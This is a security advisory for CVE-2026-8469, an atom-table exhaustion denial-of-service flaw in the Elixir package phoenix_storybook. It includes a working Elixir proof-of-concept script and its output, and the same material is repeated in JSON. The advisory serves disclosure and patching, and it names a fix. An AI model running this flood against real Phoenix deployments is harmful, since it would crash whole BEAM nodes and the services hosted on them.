GHSA-833P-95JQ-929Q

Vulnerability from github – Published: 2026-06-09 21:59 – Updated: 2026-06-09 21:59
VLAI
Summary
PhoenixStorybook: Unbounded atom creation from LiveView event params (atom-table DoS)
Details

Summary

An attacker who can deliver psb-assign, psb-toggle, psb-set-theme, upper-tab-navigation, lower-tab-navigation, playground-change, or playground-toggle LiveView events to a mounted Phoenix Storybook playground can flood the BEAM atom table with attacker-controlled strings, permanently leaking atoms until the VM hits its ~1,048,576 atom ceiling and crashes the entire node. No authentication is required beyond being able to reach the storybook route.

Tabs parsing was introduced in https://github.com/phenixdigital/phoenix_storybook/commit/0228669d55c23a754d1ef11f49a32121129d5395

Details

PhoenixStorybook.Story.Playground and PhoenixStorybook.ExtraAssignsHelpers converts user-supplied event params into atoms without checking whether the atoms already exist:

  • handle_set_variation_assign/3 (lib/phoenix_storybook/helpers/extra_assigns_helpers.ex:59) iterates the event params map and calls String.to_atom/1 on every key.
  • handle_toggle_variation_assign/3 (line 73) calls String.to_atom/1 on the "attr" value supplied by the client.
  • to_variation_id/2 (lines 90, 93) calls String.to_atom/1 on each element of "variation_id".
  • to_value/4 (lines 106, 107) calls String.to_atom/1 on the raw string value for any attribute declared as :atom or :boolean.

The existing guards do not help: check_type!/3 for :boolean inspects the atom after String.to_atom/1 has already interned it, so the leak has already happened. The :atom branch only checks is_atom/1, which is trivially true for the atom that was just created. Atoms in the BEAM are never garbage-collected, so each unique attacker string is a permanent leak; once the atom table fills, the VM aborts.

The fix is to use String.to_existing_atom/1 (with a rescue that rejects unknown names) or, better, to look the attribute / variation up in the declared story.attributes() / variation registry and reuse the atom from there.

PoC

The attached script focuses on only the first class of parameters. It encodes the threat model of an outside attacker who can deliver psb-assign events to a mounted storybook playground LiveView. LiveView event handlers route those params into the public helper PhoenixStorybook.ExtraAssignsHelpers.handle_set_variation_assign/3 (see lib/phoenix_storybook/live/story/playground_preview_live.ex), so the script calls that helper directly with attacker-shaped params — a stub FakeStory providing an empty attributes/0 list and a single :default variation, plus an extra_assigns map keyed by {:single, :default}.

Each simulated request is a params map with 5,000 unique keys of the form "psb_evil_<nonce>_<r>_<i>". Because the helper does for {key, value} <- params, ..., do: {String.to_atom(key), ...}, every distinct key is interned as a brand-new permanent atom. The script issues 5 such requests for 25,000 atoms total — modest on purpose so the script finishes quickly; raising either loop bound walks the process straight into :erlang.system_info(:atom_limit) and crashes the VM.

The script measures :erlang.system_info(:atom_count) before and after, prints the delta and the atom limit, and prints VERIFIED: … when the delta is at least requests * attrs_per_request (i.e. 25,000), proving that each attacker-controlled string became a permanent atom. No authentication is required by the helper itself — only the ability to reach the storybook route and emit the event.

The full script is attached below under "Scripts and Logs".

Impact

Unauthenticated denial-of-service via atom-table exhaustion against any Phoenix application that mounts Phoenix Storybook (1.0.0) on a network-reachable route. A single sustained stream of psb-assign / psb-toggle events with unique keys is enough to crash the entire BEAM node, taking down every application running on it — not just the storybook. The only precondition is reachability of the storybook LiveView; many deployments expose it in staging/preview environments or, by misconfiguration, in production.

Scripts and Logs

# Verifies: Unbounded atom creation from LiveView event params (atom-table DoS)
#
# Run with:
#   elixir unbounded_atom_creation_from_liveview_event_params_atom_tabl_1350.exs
#
# Threat model: an outside attacker who can deliver `psb-assign` events to a
# mounted storybook view supplies attacker-controlled param maps. The library's
# public helper `PhoenixStorybook.ExtraAssignsHelpers.handle_set_variation_assign/3`
# is the documented entry point that LiveView event handlers feed those params
# into (see lib/phoenix_storybook/live/story/playground_preview_live.ex). The
# helper interns every key of `params` with `String.to_atom/1`, so unique
# attacker strings each create a permanent atom.

Mix.install([{:phoenix_storybook, "1.0.0"}])

alias PhoenixStorybook.ExtraAssignsHelpers
alias PhoenixStorybook.Stories.Variation

defmodule FakeStory do
  def attributes, do: []
  def variations, do: [%Variation{id: :default, attributes: %{}}]
end

extra_assigns = %{{:single, :default} => %{}}

# Each request from the attacker is one params map. Use 5_000 unique attribute
# names per request, across 5 requests = 25_000 distinct atoms permanently
# leaked. (Kept modest so the script finishes quickly; raise to crash the VM.)
nonce = System.unique_integer([:positive])
requests = 5
attrs_per_request = 5_000

before_count = :erlang.system_info(:atom_count)

for r <- 1..requests do
  attacker_params =
    for i <- 1..attrs_per_request, into: %{"variation_id" => "default"} do
      {"psb_evil_#{nonce}_#{r}_#{i}", "x"}
    end

  ExtraAssignsHelpers.handle_set_variation_assign(attacker_params, extra_assigns, FakeStory)
end

after_count = :erlang.system_info(:atom_count)
delta = after_count - before_count

IO.puts("atom_count before: #{before_count}")
IO.puts("atom_count after:  #{after_count}")
IO.puts("delta:             #{delta}")
IO.puts("atom_limit:        #{:erlang.system_info(:atom_limit)}")

expected = requests * attrs_per_request

if delta >= expected do
  IO.puts(
    "VERIFIED: handle_set_variation_assign/3 interned #{delta} attacker-controlled strings as permanent atoms (limit #{:erlang.system_info(:atom_limit)}); a sustained flood exhausts the atom table and crashes the BEAM."
  )
else
  IO.puts("NOT VERIFIED: only #{delta} new atoms created (expected >= #{expected})")
end

Logs

atom_count before: 26341
atom_count after:  51361
delta:             25020
atom_limit:        1048576
VERIFIED: handle_set_variation_assign/3 interned 25020 attacker-controlled strings as permanent atoms (limit 1048576); a sustained flood exhausts the atom table and crashes the BEAM.
Severity
8.2 (High)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "phoenix_storybook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-8469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-09T21:59:07Z",
    "nvd_published_at": "2026-05-20T14:17:04Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn attacker who can deliver `psb-assign`, `psb-toggle`, `psb-set-theme`, `upper-tab-navigation`, `lower-tab-navigation`, `playground-change`, or `playground-toggle` LiveView events to a mounted Phoenix Storybook playground can flood the BEAM atom table with attacker-controlled strings, permanently leaking atoms until the VM hits its ~1,048,576 atom ceiling and crashes the entire node. No authentication is required beyond being able to reach the storybook route.\n\nTabs parsing was introduced in https://github.com/phenixdigital/phoenix_storybook/commit/0228669d55c23a754d1ef11f49a32121129d5395\n\n### Details\n`PhoenixStorybook.Story.Playground` and `PhoenixStorybook.ExtraAssignsHelpers` converts user-supplied event params into atoms without checking whether the atoms already exist:\n\n- `handle_set_variation_assign/3` (`lib/phoenix_storybook/helpers/extra_assigns_helpers.ex:59`) iterates the event params map and calls `String.to_atom/1` on every key.\n- `handle_toggle_variation_assign/3` (line 73) calls `String.to_atom/1` on the `\"attr\"` value supplied by the client.\n- `to_variation_id/2` (lines 90, 93) calls `String.to_atom/1` on each element of `\"variation_id\"`.\n- `to_value/4` (lines 106, 107) calls `String.to_atom/1` on the raw string value for any attribute declared as `:atom` or `:boolean`.\n\nThe existing guards do not help: `check_type!/3` for `:boolean` inspects the atom *after* `String.to_atom/1` has already interned it, so the leak has already happened. The `:atom` branch only checks `is_atom/1`, which is trivially true for the atom that was just created. Atoms in the BEAM are never garbage-collected, so each unique attacker string is a permanent leak; once the atom table fills, the VM aborts.\n\nThe fix is to use `String.to_existing_atom/1` (with a rescue that rejects unknown names) or, better, to look the attribute / variation up in the declared `story.attributes()` / variation registry and reuse the atom from there.\n\n### PoC\nThe attached script focuses on only the first class of parameters. It encodes the threat model of an outside attacker who can deliver `psb-assign` events to a mounted storybook playground LiveView. LiveView event handlers route those params into the public helper `PhoenixStorybook.ExtraAssignsHelpers.handle_set_variation_assign/3` (see `lib/phoenix_storybook/live/story/playground_preview_live.ex`), so the script calls that helper directly with attacker-shaped params \u2014 a stub `FakeStory` providing an empty `attributes/0` list and a single `:default` variation, plus an `extra_assigns` map keyed by `{:single, :default}`.\n\nEach simulated request is a params map with 5,000 unique keys of the form `\"psb_evil_\u003cnonce\u003e_\u003cr\u003e_\u003ci\u003e\"`. Because the helper does `for {key, value} \u003c- params, ..., do: {String.to_atom(key), ...}`, every distinct key is interned as a brand-new permanent atom. The script issues 5 such requests for 25,000 atoms total \u2014 modest on purpose so the script finishes quickly; raising either loop bound walks the process straight into `:erlang.system_info(:atom_limit)` and crashes the VM.\n\nThe script measures `:erlang.system_info(:atom_count)` before and after, prints the delta and the atom limit, and prints `VERIFIED: \u2026` when the delta is at least `requests * attrs_per_request` (i.e. 25,000), proving that each attacker-controlled string became a permanent atom. No authentication is required by the helper itself \u2014 only the ability to reach the storybook route and emit the event.\n\nThe full script is attached below under \"Scripts and Logs\".\n\n### Impact\nUnauthenticated denial-of-service via atom-table exhaustion against any Phoenix application that mounts Phoenix Storybook (1.0.0) on a network-reachable route. A single sustained stream of `psb-assign` / `psb-toggle` events with unique keys is enough to crash the entire BEAM node, taking down every application running on it \u2014 not just the storybook. The only precondition is reachability of the storybook LiveView; many deployments expose it in staging/preview environments or, by misconfiguration, in production.\n\n## Scripts and Logs\n\n```elixir\n# Verifies: Unbounded atom creation from LiveView event params (atom-table DoS)\n#\n# Run with:\n#   elixir unbounded_atom_creation_from_liveview_event_params_atom_tabl_1350.exs\n#\n# Threat model: an outside attacker who can deliver `psb-assign` events to a\n# mounted storybook view supplies attacker-controlled param maps. The library\u0027s\n# public helper `PhoenixStorybook.ExtraAssignsHelpers.handle_set_variation_assign/3`\n# is the documented entry point that LiveView event handlers feed those params\n# into (see lib/phoenix_storybook/live/story/playground_preview_live.ex). The\n# helper interns every key of `params` with `String.to_atom/1`, so unique\n# attacker strings each create a permanent atom.\n\nMix.install([{:phoenix_storybook, \"1.0.0\"}])\n\nalias PhoenixStorybook.ExtraAssignsHelpers\nalias PhoenixStorybook.Stories.Variation\n\ndefmodule FakeStory do\n  def attributes, do: []\n  def variations, do: [%Variation{id: :default, attributes: %{}}]\nend\n\nextra_assigns = %{{:single, :default} =\u003e %{}}\n\n# Each request from the attacker is one params map. Use 5_000 unique attribute\n# names per request, across 5 requests = 25_000 distinct atoms permanently\n# leaked. (Kept modest so the script finishes quickly; raise to crash the VM.)\nnonce = System.unique_integer([:positive])\nrequests = 5\nattrs_per_request = 5_000\n\nbefore_count = :erlang.system_info(:atom_count)\n\nfor r \u003c- 1..requests do\n  attacker_params =\n    for i \u003c- 1..attrs_per_request, into: %{\"variation_id\" =\u003e \"default\"} do\n      {\"psb_evil_#{nonce}_#{r}_#{i}\", \"x\"}\n    end\n\n  ExtraAssignsHelpers.handle_set_variation_assign(attacker_params, extra_assigns, FakeStory)\nend\n\nafter_count = :erlang.system_info(:atom_count)\ndelta = after_count - before_count\n\nIO.puts(\"atom_count before: #{before_count}\")\nIO.puts(\"atom_count after:  #{after_count}\")\nIO.puts(\"delta:             #{delta}\")\nIO.puts(\"atom_limit:        #{:erlang.system_info(:atom_limit)}\")\n\nexpected = requests * attrs_per_request\n\nif delta \u003e= expected do\n  IO.puts(\n    \"VERIFIED: handle_set_variation_assign/3 interned #{delta} attacker-controlled strings as permanent atoms (limit #{:erlang.system_info(:atom_limit)}); a sustained flood exhausts the atom table and crashes the BEAM.\"\n  )\nelse\n  IO.puts(\"NOT VERIFIED: only #{delta} new atoms created (expected \u003e= #{expected})\")\nend\n\n```\n\n### Logs\n\n```logs\natom_count before: 26341\natom_count after:  51361\ndelta:             25020\natom_limit:        1048576\nVERIFIED: handle_set_variation_assign/3 interned 25020 attacker-controlled strings as permanent atoms (limit 1048576); a sustained flood exhausts the atom table and crashes the BEAM.\n```",
  "id": "GHSA-833p-95jq-929q",
  "modified": "2026-06-09T21:59:07Z",
  "published": "2026-06-09T21:59:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-833p-95jq-929q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/phenixdigital/phoenix_storybook/commit/96d524690af0fe197a49f60d18e564a620b9ef81"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-8469.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/phenixdigital/phoenix_storybook"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-8469"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PhoenixStorybook: Unbounded atom creation from LiveView event params (atom-table DoS)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.